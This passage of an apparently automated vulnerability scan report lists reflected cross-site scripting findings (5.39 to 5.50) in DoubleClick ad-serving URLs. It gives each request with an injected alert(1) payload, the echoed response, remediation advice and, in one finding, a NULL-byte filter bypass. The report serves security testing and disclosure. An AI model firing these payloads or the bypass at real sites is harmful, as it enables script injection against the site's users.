Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6406
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 19:27:47 GMT
Expires: Sun, 30 Jan 2011 19:27:47 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Nov 01 17:12:22 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
pg";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189%00d3181"-alert(1)-"1701a13e520&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/e0/%2a/v%3B231464797%3B0-0%3B0%3B55598777%3B4307-300/250%3B38973907/38991664/
...[SNIP]...

5.39. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2489a'-alert(1)-'8542b43425 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=301991892489a'-alert(1)-'8542b43425&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:50:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6235

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 17:25:10 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=301991892489a'-alert(1)-'8542b43425&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dc/%2a/x%3B231464651%3B0-0%3B0%3B55598777%3B4307-300/250%3B38973935/38991692/
...[SNIP]...

5.40. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49052"-alert(1)-"19cd9540b8a was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=3019918949052"-alert(1)-"19cd9540b8a&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:50:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6398

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 28 19:09:32 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0.jpg";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=3019918949052"-alert(1)-"19cd9540b8a&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dd/%2a/c%3B235513126%3B2-0%3B0%3B55598777%3B4307-300/250%3B39096156/39113913/
...[SNIP]...

5.41. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00a3d12"-alert(1)-"36b734b7ab0 was submitted in the UIT parameter. This input was echoed as a3d12"-alert(1)-"36b734b7ab0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G%00a3d12"-alert(1)-"36b734b7ab0&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6340
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 19:27:30 GMT
Expires: Sun, 30 Jan 2011 19:27:30 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 28 17:42:12 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
PR_SOLAR_300x250.jpg";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G%00a3d12"-alert(1)-"36b734b7ab0&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/e0/%2a/q%3B231577755%3B0-0%3B0%3B55598777%3B4307-300/250%3B
...[SNIP]...

5.42. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 431e1'-alert(1)-'5bd123bb5c9 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G431e1'-alert(1)-'5bd123bb5c9&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:49:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6394

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 28 17:44:31 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G431e1'-alert(1)-'5bd123bb5c9&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dd/%2a/s%3B231464761%3B0-0%3B0%3B55598777%3B4307-300/250%3B
...[SNIP]...

5.43. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [destination parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 839ca"-alert(1)-"5a90ece2f0a was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=839ca"-alert(1)-"5a90ece2f0a HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6210
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:51:05 GMT
Expires: Sun, 30 Jan 2011 14:51:05 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 17:27:21 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=839ca"-alert(1)-"5a90ece2f0ahttp://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dd/%2a/m%3B231464693%3B0-0%3B0%3B55598777%3B4307-300/250%3B38973930/38991687/2%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://www.toyota.c
...[SNIP]...

5.44. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [destination parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51164'-alert(1)-'9f97bc8ebe8 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=51164'-alert(1)-'9f97bc8ebe8 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 546
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:51:09 GMT
Expires: Sun, 30 Jan 2011 14:51:09 GMT

document.write('<a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=51164'-alert(1)-'9f97bc8ebe8http://ad.doubleclick.net/click;h=v8/3a9f/14/dd/%2a/k;235513946;0-0;0;55598777;4307-300/250;40425053/40442840/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttp://www.toyota.com/ideasforgood">
...[SNIP]...

5.45. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9990f"-alert(1)-"68474f31a2a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!9990f"-alert(1)-"68474f31a2a&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:48:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6365

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 28 19:09:32 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
792905/1-11HI_COLORIZER_BACKUP_300x250.jpg";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!9990f"-alert(1)-"68474f31a2a&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dd/%2a/h%3B231983801%3B0-0%3B0%3B5559877
...[SNIP]...

5.46. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f03d'-alert(1)-'e1b575eb0ff was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!5f03d'-alert(1)-'e1b575eb0ff&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:48:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6239

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 17:25:10 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!5f03d'-alert(1)-'e1b575eb0ff&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dd/%2a/x%3B231464651%3B0-0%3B0%3B5559877
...[SNIP]...

5.47. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.31

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4546'-alert(1)-'157905325f3 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.31;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875d4546'-alert(1)-'157905325f3&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=;ord=423168972? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:49:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 597

document.write('<a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875d4546'-alert(1)-'157905325f3&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/db/%2a/l;233815726;0-0;0;57696442;91-300/60;39157699/39175
...[SNIP]...

5.48. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.31

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc5d7'-alert(1)-'b7357488df1 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.31;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972dc5d7'-alert(1)-'b7357488df1&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=;ord=423168972? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:50:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 597

document.write('<a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972dc5d7'-alert(1)-'b7357488df1&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/db/%2a/l;233815726;0-0;0;57696442;91-300/60;39157699/39175486/1;;~sscs=%3fhttp://www.progressiv
...[SNIP]...

5.49. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.31

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9da96'-alert(1)-'4611c74e57a was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.31;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab9da96'-alert(1)-'4611c74e57a&destination=;ord=423168972? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:50:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 597

document.write('<a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab9da96'-alert(1)-'4611c74e57a&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/db/%2a/l;233815726;0-0;0;57696442;91-300/60;39157699/39175486/1;;~sscs=%3fhttp://www.progressive.com/insurance/nyp/display.aspx?&code=990360023
...[SNIP]...

5.50. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.31

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14656'-alert(1)-'cde54af0bc was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.31;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC414656'-alert(1)-'cde54af0bc&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=;ord=423168972? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:50:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 596

document.write('<a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC414656'-alert(1)-'cde54af0bc&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/da/%2a/l;233815726;0-0;0;57696442;91-300/60;39157699/39175486/1;;~sscs=%3fhttp://www.progressive.com/insu
...[SNIP]...

